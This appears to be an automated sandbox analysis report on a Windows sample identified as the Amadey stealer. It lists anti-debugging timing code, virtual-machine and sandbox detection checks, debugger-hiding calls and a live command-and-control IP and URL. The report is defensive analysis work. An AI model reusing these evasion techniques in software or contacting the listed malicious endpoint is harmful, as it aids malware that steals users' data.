Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0BA8 second address: 53D0BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0BAC second address: 53D0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007F43C8AE0087h 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, edx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0BD7 second address: 53D0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0BDD second address: 53D0BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0D88 second address: 53E0D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0D8C second address: 53E0D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0A8D second address: 53E0A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450E73 second address: 5450E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450E79 second address: 5450E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450E7D second address: 5450EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F43C8AE0086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450EAB second address: 5450EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 1599C5F9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450EB5 second address: 5450ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450514 second address: 5450530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545033A second address: 545038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 48786F68h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov ebx, 19C13044h 0x0000001a pushfd 0x0000001b jmp 00007F43C8AE007Dh 0x00000020 sub eax, 7724E186h 0x00000026 jmp 00007F43C8AE0081h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F43C8AE007Dh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545038C second address: 54503A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54503A8 second address: 54503AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54503AC second address: 54503B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0167 second address: 53F01C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43C8AE007Ah 0x00000011 or esi, 610588F8h 0x00000017 jmp 00007F43C8AE007Bh 0x0000001c popfd 0x0000001d call 00007F43C8AE0088h 0x00000022 movzx ecx, di 0x00000025 pop edi 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007F43C8AE0083h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F01C5 second address: 53F01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F01C9 second address: 53F0229 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F43C8AE0084h 0x00000008 adc ecx, 16CF34E8h 0x0000000e jmp 00007F43C8AE007Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F43C8AE0084h 0x0000001f add si, 4748h 0x00000024 jmp 00007F43C8AE007Bh 0x00000029 popfd 0x0000002a mov ax, 4EBFh 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 mov dl, B8h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450686 second address: 545068C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545068C second address: 54506AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bl, ah 0x0000000e mov edx, 26EF6E4Eh 0x00000013 popad 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506AE second address: 54506B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506B2 second address: 54506C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506C0 second address: 54506D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506D2 second address: 54506F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov esi, 22EEA83Fh 0x00000011 popad 0x00000012 push 912E01ADh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F43C8AE007Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506F9 second address: 545070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545070B second address: 545070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: C4EBCC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: C4EC6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E098B4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E37BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E1084E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe Special instruction interceptor: First address: E9AC13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FCEBCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FCEC6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11898B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11B7BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 119084E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 121AC13 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\msqT9atzYW.exe Code function: 0_2_05450654 rdtsc 0_2_05450654
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1081 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 511 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1316 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1201 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836 Thread sleep time: -74037s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512 Thread sleep count: 1081 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512 Thread sleep time: -2163081s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788 Thread sleep count: 511 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788 Thread sleep time: -15330000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2848 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856 Thread sleep count: 1316 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856 Thread sleep time: -2633316s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396 Thread sleep count: 1201 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396 Thread sleep time: -2403201s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msqT9atzYW.exe, 00000000.00000002.2266464940.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2299739662.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2311366015.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\msqT9atzYW.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\msqT9atzYW.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\msqT9atzYW.exe Code function: 0_2_05450654 rdtsc 0_2_05450654
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F9652B mov eax, dword ptr fs:[00000030h] 7_2_00F9652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F9A302 mov eax, dword ptr fs:[00000030h] 7_2_00F9A302
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: EProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F7D3E2 cpuid 7_2_00F7D3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F7CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_00F7CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F665E0 LookupAccountNameA, 7_2_00F665E0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 7.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.msqT9atzYW.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.2271001764.0000000005790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2311270072.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2764127770.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2266387478.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2299648103.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2226138822.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2258806341.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540828 Sample: msqT9atzYW.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 24 Multi AV Scanner detection for domain / URL 2->24 26 Suricata IDS alerts for network traffic 2->26 28 Found malware configuration 2->28 30 8 other signatures 2->30 6 msqT9atzYW.exe 5 2->6         started        10 skotes.exe 12 2->10         started        13 skotes.exe 2->13         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\skotes.exe, PE32 6->18 dropped 20 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 skotes.exe 6->15         started        22 185.215.113.43, 49982, 49983, 49984 WHOLESALECONNECTIONSNL Portugal 10->22 38 Hides threads from debuggers 10->38 40 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->40 42 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->42 file5 signatures6 process7 signatures8 44 Antivirus detection for dropped file 15->44 46 Multi AV Scanner detection for dropped file 15->46 48 Detected unpacking (changes PE section rights) 15->48 50 6 other signatures 15->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.43/Zu7JuNko/index.php true
  • URL Reputation: phishing
 unknown